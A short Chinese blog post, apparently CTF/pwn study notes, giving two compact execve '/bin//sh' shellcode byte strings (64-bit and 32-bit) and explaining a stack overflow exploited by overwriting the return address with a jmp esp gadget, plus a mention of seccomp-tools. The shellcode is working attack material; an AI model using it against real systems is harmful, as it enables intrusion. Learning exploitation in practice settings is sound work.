Shellcode

发布于 2023-02-27 121 次阅读

64位较短shellcode 23 字节：

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

32位较短shellcode 21字节：

\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

Shellcode简介：

Shellcode的具体利用如下，分析函数主体,s距离ebp仅20距离，但fgets函数能读入50字符，故存在栈溢出，但程序没有system调用，但下方有个hint函数，其中有jmp esp，可以直接跳转到栈中执行，此时就需要我们先输入shellcode，再将返回地址覆盖为jmp esp ，

对于没有system能直接调用shellcode的函数，这时我们就需要一些跳板指令，就比如上面的jmp esp指令，跳转到目标栈中执行我们的指令。

对于沙箱保护：

seccomp-tools使用方法 seccomp-tools dump file，查看该程序允许我们使用的函数。

shellcode的变形：

装载与汇编

PWN栈溢出基础

Author

zlp

穿过云层我试着努力向你奔跑

查看评论 - NOTHING

Comments | NOTHING

暂无评论

取消回复

Markdown Supported while Forbidden

你是我一生只会遇见一次的惊喜 ...

戳我试试 OωO 嘿嘿嘿ヾ(≧∇≦*)ゝ

bilibili~	(=・ω・=)	Tieba

滴，学生卡

ZLP

切换主题 | SCHEME TOOL